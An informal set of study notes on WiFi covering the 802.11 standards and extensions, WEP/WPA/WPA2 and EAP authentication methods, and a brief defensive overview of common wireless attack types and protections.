WiFi Specifications
- Direct Sequence Spread Spectrum - signal spread
through the use of sequence, uses more bandwidth with lower power
density.
- CSMA/CA (carrier sense multiple access/collision avoidance
- ack packet from AP indicates packet received and checksummed correctly. if no ack, resend entire packet
- Active Scanning - Send probe packet, wait for probe
response packet from AP.
- Passive Scanning - Listen for beacon frame from AP.
- Authentication
- Association - Info about station, capabilities of BSS
are exchanged.
- Roaming - moving from one cell to another without
losing cnonection.
- ISM band 2.4-2.4835GHz. UNII band 5-6GHz.
- Power limited to 100mW ETSI limits DSSS
power density to 20 dbW/MHz and FHSS power density to -10dbW/100kHz.
- Speeds of each standard downshift as you get farther
away from transmitting source (e.g. AP).
Standards
| 802.11 |
1997. Original std. 2.4-2.6 GHz FCC unregulated range. FHSS and DSSS and IR. Barker11. BPSK/QPSK. Up to 2 Mbps. |
| 802.11b |
1999. 2.4-2.6 GHz FCC unregulated range. FHSS and DSSS. Barker11. BPSK/QPSK/CCK. Rated at 1, 2, 5.5, and 11Mbps. Wifi Alliance certs DSSS as "wifi".
(achieved throughput is 4.3-6Mbps). Range
~38meters depending on environment.
Uses CCK (Complementary Code Keying) as opposed to Barker
Chipping Codes. Taken from Webopedia.
"Not interoperable with 802.11a. Requires fewer access points than
802.11a for coverage of large areas. Offers high-speed access to data
at up to 300 feet from base station. 14 channels (5MHz) available in the
2.4GHz band (only 11 of which can be used in the U.S. due to FCC
regulations) with only three non-overlapping channels." US
typically uses channel 1, 6, and 11. Consider using different
channels when you have neighboring APs. Channel is 22MHz wide
with 1MHz carrier. Each channel is 5MHz away from next
channel
and 22 MHz wide, which is way there are overlapping channels.
Uses DSSS. |
| 802.11a |
1999 5GHz (4.915 - 5.825) range. OFDM. BPSK/QPSK/16-QAM/64-QAM. Chan avail varies country to country. Theoretical Max
bandwidth of 6,9,12,18,24,36,48,and 54Mbps. (achieved throughput 32Mbps). Range max -
Taken from Webopedia.
"Eight available channels. Less potential for RF interference than
802.11b and 802.11g. Better than 802.11b at supporting multimedia
voice, video and large-image applications in densely populated user
environments. Relatively shorter range than 802.11b. Not interoperable
with 802.11b." Allows for 12 non-overlapping channels (not
all
bands available in all countries). Can be colocated with more
APs
than 802.11a/g. Uses OFDM (Orthogonal Freq Div Multiplexing)
to
transmit sub-signals simultaneously on diff frequencies. |
| 802.11g |
2003. 2.4 GHz FCC unregulated range. OFDM. BPSK/QPSK/16-QAM/64-QAM. Backwards
compatable with 802.11b. Theoretical max speed of 6,9,12,18,24,36,48,54Mbps. Cells are smaller than 802.11b because power is lower for OFDM.
(achieved throughput 32Mbps). OFDM.
- To coexist b and g rts/cts (with duration) sent in b before g data frame. could also send (less clean) 'CTS to self' only. This protection good for b, not g clients drops percieved throughtput from ~23Mbps to ~8Mbps
- In beacons: non-ERP (802.11b), in the cell yes/no, use protection yes/no
Taken from Webopedia.
"Improved security enhancements over 802.11. Compatible with 802.11b.
14 channels available in the 2.4GHz band (only 11 of which can be used
in the U.S. due to FCC regulations) with only three non-overlapping
channels." US typically uses channel 1, 6, and 11.
Consider using different channels when you have neighboring
APs. If used with 802.11b will slow down and use CCK
modulation. Otherwise uses Barker code. Uses OFDM. |
| 802.11n |
2009. Focus on features not band
- Channel Aggregation
- 128 subcarriers (vs. 64) for 40MHz channel aggregate, 14 zero subcarriers (vs. 12) for calibration on sides and center. 6 pilot subcarriers (vs. 4) for synch and tracking. Result 108 data subcarrriers (vs. 48).
- Cisco doesn't do channel aggregation in 2.4. not enough channels
- only aggregate channels that aren't going to conflict with your neighbors (e.g. 46 and 40 not 40 and 44)
- block acknowledgements
- short guard intervals - reduce from 800ns to 400ns - affected by echos
- mimo - send and recieve several useful signals (instead of unused echoes). Input to antenna. Output from antenna. siso - single in single out. simo - single in multi out, miso, mimo, etc. radio chain multiple radios and antennas. spatial stream. sending symbols from 1 source across multiple streams - recombine at receiving end - spacial multiplexing.
- Transmit Beamforming (Cisco calls ClientLink - based on signal back from client) - form beams so receiving station receives all parts of mimo transmissions at same time.
- OR Maximal Ration Combining - receiving side synch signals for stronger signal
- up to 4 streams, in practice max is 3, most handheld devices have 1 or 2 SS, save battery
| Spatial streams |
Data rate (20MHz channel, 800ns GI) |
Data rate (20MHz channel, 400ns GI) |
Data rate (40MHz channel, 800ns GI) |
Data rate (40MHz channel, 400ns GI) |
| 1 | 65.5 | 72.2 | 135 | 150 |
| 2 | 130 | 144.4 | 270 | 300 |
| 3 | 195 | 216.7 | 405 | 450 |
| 4 | 260 | 288.8 | 540 | 600 |
- now protection header bit is modulated at slow speed, rest of fram higher speed
Taken from Webopedia. An extension to 802.11 specification developed by the IEEE for wireless LAN (WLAN) technology. 802.11n builds upon previous 802.11 standards by adding multiple-input multiple-output (MIMO). The additional transmitter and receiver antennas allow for increased data throughput through spatial multiplexing and increased range by exploiting the spatial diversity (up to 4 streams) through coding schemes like Alamouti coding. The speed is 100 Mbit/s (even 250 Mbit/s in PHY level), and so up to 4-5 times faster than 802.11g. 802.11n also offers a better operating distance than current networks.
|
| 802.11ac |
Only on 5GHz. Up to 80 MHz or 160 MHz channels. Up to 8 spatial streams/radio circuits (hard). up to 256-QAM. Better manage the cell.
- MU-MIMO - use unused antenna/radios to communicate with another client. downstream only
- 160 MHz-wide channel, 8 antenna AP with MU-MIMO support - Example best case depending on stations
- One 4-SS, 160MHz client, 3.47Gbps data rate, AT THE SAME TIME AS
- One 2-SS, 160MHz client, 1.73Gbps data rate, AT THE SAME TIME AS
- Two 1-SS, 160MHz client, 867 MBps data rate.
- 256-QAM - need high quality signal and snr. only works very close. a lot of points. bbecause so many points, slow down modulation a little.
- Protection header bit modulated at slow speed, same as 802.11n, also protects against channel width RTS on all 4 sub channels, client only responds where it can
- Wave 1 - 80 MHz, 3 ss, no MU-MIMO, 256-QAM Optional
- Wave 2 - 160 MHz, 4 ss, yes MU-MIMO, 256-QAM included
Taken from wikipedia. Expected multi-station throughput of at least 1 gbit/sec. Single link throughput of at least 500 mbits/sec. Wider RF bandwitdth up to 160 MHz, more MIMO spacial streams (upt o 80, downlink multi-user MIMO (up to 4 clients), hi density modulation (up to 256-QAM).
- 80 MHz channel bandwidth, 160 MHz channel optional
- Up to 8 spatial streams
- 256-QAM
- Beamforming
- Coexistence between 802.11ac and 802.11a/n
- 4 new fields in PPDU header identifying fram as VHT
|
| 802.11ad | WiGig, 60 GHz millimeter wave spectrum, 7gbit/sec. 802.11aj rebands 802.11ad for use in 45GHz unlicenseced spectrum available in some regions of world (esp China) |
| 802.11af | White-Fi, Super WiFi, operates in TV white space between VHF and UHF between 54 and 797mhz. uses cognitive radio tech to transmit on unused tv channels, limiting interference for regular analog/digital tv signals, wireless microphones. OFDM, based on 802.11ac. Increased range, adn can get through brick/concrete better. 5 - 8 MHz wide freq channells. up to 4 channels may be bonded. MIMO possible with up to 4 streams with either space-time block code or multi-user operation. 26.7 Mbit/s or 35.6 mbit/s. 4 spacial streams and 4 bonded channls = max data rate of 426.7 bit/s for 6 an d 7 MHz, and 568.9 Mbit/s for 8 Mhz channels |
| 802.11ah | sub 1GHz license exemt bands. improved transmission range compared to conventianal 802.11. purposes inclde large scale sensor networks, extended range hotspot, outdoor wifi for cel traffic offloading |
| 802.11ax | successor to 802.11ac. increase efficiency of WLAN networks. Adds 6GHz range to the 2.4GHz and 5GHz ranges already in use. Marketing type have designated that this is part of what makes WiFi 6E. Uses orthogonal frequency-division multiple access (OFDMA), which is equivalent to cellular technology applied into Wi-Fi. Better power-control methods to avoid interference with neighboring networks, higher order 1024-QAM, up-link direction added with the down-link of MIMO and MU-MIMO to further increase throughput, as well as dependability improvements of power consumption and security protocols such as Target Wake Time and WPA3 |
Extensions
| 802.11e |
QoS standards over wireless LANs. Geered towards real-time apps like IP telpehony. 4 potential classes - voice, video, best-effort, background. Allows client to mark priority. enhances from PCF and DCF with HCCA and EDCA to define traffic categories. TCMA protocol variation on csma/ca using shorter arbitration interframe space for hi prio packets. ECDA/Transmit Op (TXOP) bounded time interval given whicha station can send as many frames as possible. TXOP time interval of 0 means single MAC svc data unit or MAC mgmt proto data unit. ECDA also has access categories (ACs). Contention window set according to AC of packet.
taken from wikipedia
| - |
802.1P |
802.11e |
| Priority |
Priority Code Point (PCP) |
Acronym |
Traffic Type |
Access Category (AC) |
Designation |
| Lowest |
1 |
BK |
Background |
AC_BK |
Background |
|
0 |
BE |
Best Effort |
AC_BE |
Best Effort |
|
2 |
EE |
Excellent Effort |
AC_BE |
Best Effort |
|
3 |
CA |
Critical Applications |
AC_VI |
Video |
|
4 |
VI |
Video |
AC_VI |
Video |
|
5 |
VO |
Voice |
AC_VO |
Voice |
|
6 |
IC |
Internetwork Control |
AC_VO |
Voice |
| Highest |
7 |
NC |
Network Control |
AC_VO |
Voice |
HCCA - multi beacon frams CP and CP. CFP is Controlled Access Phase (CAP. initiated whenever AP wants to send or receive frame contention free. Traffic Clas and Traffic Streams defined. HC can giv prio to one station over another depeending on queue information of station. Prio can also be given using TXOP.
|
| 802.11k |
limit scanning needs. ap can return channels for neighboring APs |
| 802.11p |
wireless for car to car comms |
| 802.11r |
Roaming speedup. Standard designed to
speed handoffs between access points or cells in a wireless LAN. Makes
sure QoS and Security are in place before transition to new AP
- Prenegotiate QoS and Credentials on new wap before leaving old one
|
| 802.11s |
Standard submitted to IETF to
allow for wireless mesh of WiFi networks. A wireless mesh uses a radio
to interconnect the access points and route wireless packets over the
best available route. Mesh benefits include potentially higher
performance and more reliable nets. |
| 802.11u |
hotspot 2.0 - describe how station can discover svcs - free wifi or, private, internet, can you connect me to my cell isp secure svr? automate authentication with EAP-SIM/WPA2 |
| 802.11v |
BSS Transition Mgmt (better than 802.11k). AAP returns list of neighbors where to roam to. |
| 802.11w |
Secures mgmt frames by signing them. eliminates de-auth hacking |
| 802.11ai |
faster initial link setup |
| 802.11aq |
enable pre-association discovery of services. extends mechanisms in 802.11u to discover services running on a device or provided by a network |
Security
| WEP |
Obsolete security scheme.
- RC4 stream cipher for confidentiality
- CRC-32 checksum for integrity.
- 64-bit WEP uses a 40-bit key, and 24-bit
initialization vector (IV). 24-bit IV is too short.
- 128-bit WEP with 104-bit key size was put in
place after US
Gov export restrictions lifted. Key size turned out not to be the issue
with this standard. Weak keys and related-key attacks.
|
| WPA |
- WiFi Protected Access, (based on 802.11i draft(v4 2002)
- RC4 stream cipher, 128-bit key, stronger (48-bit) IV.
- 'Michael' Message Auth Code/Message Integrity
Code (MIC) - as opposed to CRC for integrity.
- TKIP - dynamically changes keys as system is
used. Insures that every data packet is sent with its own unique encryption key.
Can detect whether or not pkt has been damaged or altered using
message-integrity check (MIC or Mikey). Makes sure packets arrive
in sequence (using sequence id (incr by one for each pkt). When
key changes, seq goes to zero). Combined with larger IV
(initialization vector), defeats key recovery attacks on WEP.
- 802.1X or (less-secure) pre-shared key
- Put in place because WPA2 work was taking
longer then anticipated.
|
802.11i (published 2004)
WPAv2 |
Updated security standard.
Interoperable implementations called WPA2 by Wi-Fi Alliance. Superceeds
WEP and WPA which have demonstrated security weaknesses.
- AES block cipher (block size of 128 bits, key size of 128, 192 or 256 bits)
- CCMP Message Authentication Code
- 802.1X
- TKIP not recommended, but allowed. Wifi alliance says don't use.
- PSK or 802.1x/EAP
|
| 802.1x | Port-based access ctrl to the network at L2. Users are not allows to join network until they are authenticated. Uses one of the EAPs to authenticat. |
| WISPr | (Wireless Internet Service Provider roaming) - allows users to roam between wireless internet service providers. |
EAP
Extensible Authentication Protocol |
- LEAP - Lightweight
Extensible Authentication Protocol -
Cisco Special - Crackable, though Cisco claims secure if sufficiently
complex passwords are used.
- EAP-TLS - IETF open
standard. Uses TLS (Transport
Layer Security) with PKI to a Radius auth svr. Client-side certs
needed, so can be hard to deploy. Mostly widely supported
standard. Only weakness is that username passed from client in
the clear before certs are exchanged.
Supplicant Authenticator Auth Svr
------EAP Start----->
<--Identity Request--
--Identity Response-> --------------->
<-Server Certificate- <---------------
--Client Certificate-> --------------->
-----Session keys----> <---------------
<----Session keys----- <---------------
(gen PMK) (gen PMK)
- EAP-MD5 - IETF open standard
- MD5 hash function vulnerable to dictionary attacks. EAP does not
support dynamic WEP. Client has no way to auth svr. Challeng string sent to client in the clear.
- EAP-POTP - Protected One-Time Password (RFC4793) - developed by RSA Laboratories, uses one-time password (OTP) tokens to generate auth keys. Provides 2-factor user auth - user needs phys access to token and knowledge of PIN to perform authentication
- EAP-PSK - Preshared key (RFC4764) - provides protected comm channel, when mutual auth is successful. Lightweight and extensible EAP metho does not require any public-key crtyto. 4 msg exchange
- EAP-PWD - shared pw used for auth (RFC5931) - low entropy pw may be used and drawn from some set of possible pws like a dictionary. Underlying key exchange resistant to active / passive / dictionary attacks. Android 4.0+, freeradious, radioator servers, hostapd wpasupplicant
- EAP-TTLS/MSCHAPv2 - Funk
Software/Certicom - IETF draft open standard. Good security. PKI certs
only on auth svr.
- EAP-IKEv2 - based on Internet Key Exchange protocol v2 (RFC5106) - provides mutual auth, and session key establishemnt between peer and server. Auth techniques can be asymmetric key pairs, passwords, symmetric keys. Possible to use different credtials/techniques in each directionn.
- EAP-FAST - replacment for LEAP, while maintaining lightweight implementation. Uses Protected Access Credential (PAC) to establish TLS tunnel in which client credentials are verified. PAC can be intercepted and compromise user credential - mitigated by manual PAC provisioning or by using server certs for provisioning phase. PAC file issued per-user
- Phase Zero - Done in advance. Server give locked box with key inside it to client, give key outside box also. PAC contains svr id, locked key/pw, and clear key/pw
- Phase One - Client comes back, gives locked box with pw inside it
- Phase Two - Exchange ID Req and Resp. Client sends credentials to server. Server returns session keys.
Supplicant Authenticator Auth Svr
------EAP Start----->
<--Identity Request--
--Fake ID response-->
<------Auth-ID------- <---------------
-----PAC Opaque-----> --------------->
<--Identity Request-- --------------->
--Identity Response--> --------------->
-----Credentials-----> --------------->
<----Session keys----- <---------------
(gen PMK) (gen PMK)
- PEAPv0/EAP-MSCHAPv2 -
Cisco/Microsoft/RSA - open
standard. Good Security. Similar to EAP-TTLS. Only requires server side
PKI cert. Usually what people most commonly refer to as PEAP. 2nd most
commonly supported form of EAP. Internet Draft.
Supplicant Authenticator Auth Svr
------EAP Start----->
<--Identity Request--
--Fake ID response-->
<-Server Certificate- <---------------
-Pre-Master Certificate-> --------------->
<--Identity Request-- --------------->
--Identity Response--> --------------->
-----Credentials-----> --------------->
<----Session keys----- <---------------
(gen PMK) (gen PMK)
- PEAPv1/EAP-GTC - Cisco -
Alternative to
PEAPv0/EAP-MSCHAPv2. Uses inner auth protocol other then (Microsoft's)
MSCHAPv2. Microsoft doesn't suppoort PEAPv1.
- EAP-FASTv1 - GTC
- EAP-FASTv1a - MSCHAPv2, TLS
- EAP-SIM - auth/session key distribution using GSM SIMs.
- EAP-AKA - auth/session key distribution using UMTS SIMs.
- EAP-AKA-PRIME - ???auth/session key distribution using UMTS SIMs.
- EAP-GTC - Generic Token Card (RFC2284 and RFC3748 - meant as alternative to PEAPv0/EAP-MSCHAPv2. Carries text challenge from auth server, reply generated by security token
- EAP-EKE - Encrypted key exchange (RFC6124) - provide secure mutual auth using short passwords and no public key cert. 3-route exchange, based on DiffieHellman veriant.
|
| IPSec | Use IPSec over WLAN. Especially ESP. |
Hacking Tools
Hacking tools can listen on the air an dgain access ot the following info:
- MAC addr of AP
- SSID
- Manufacturer
- Channel is was heard on
- WEP enabled (yes/no)
- Signal strenth and signal strength-to-noise ratio
DON'T USE DEFAULT SETTINGS.
CONSIDER NOT ATTACHING A WLAN INSTALLATION DIRECTLY TO YOUR WIRED INSTALLATION.
Types of WLAN attacks- Active Attacks
- DoS
- DDoS
- Impersonation - use a spoofed MAC addr
- Jamming - generate a signal strong enough so WLAN clients and APs can no longer hear each other.
- Man-in-the-middle - Generate a stronger AP signaland users are forced to roam
- Modification and insertion - modify packet and get CRC correct
- Passive attacks - eavesdrop. What isn't encrypted...?
- Stealing bandwidth - use for access.
Wireless Protection- Do not connect WLAN dirctly to wired lan. FW or security switch.
- Use
(at least) 128-bit WEB. Basic form of auth between client and AP.
Even better WPA2. Nortel suggests VPN (IPSec).
- Implement MAC filters.
- Turn of AP's SSID broadcasting beacons and probe responses.
- Turn on 802.1x and EAP (preferable EAP-TTLS or some other strong EAP).
- Set up AP to notify net admin of rogue APs.
|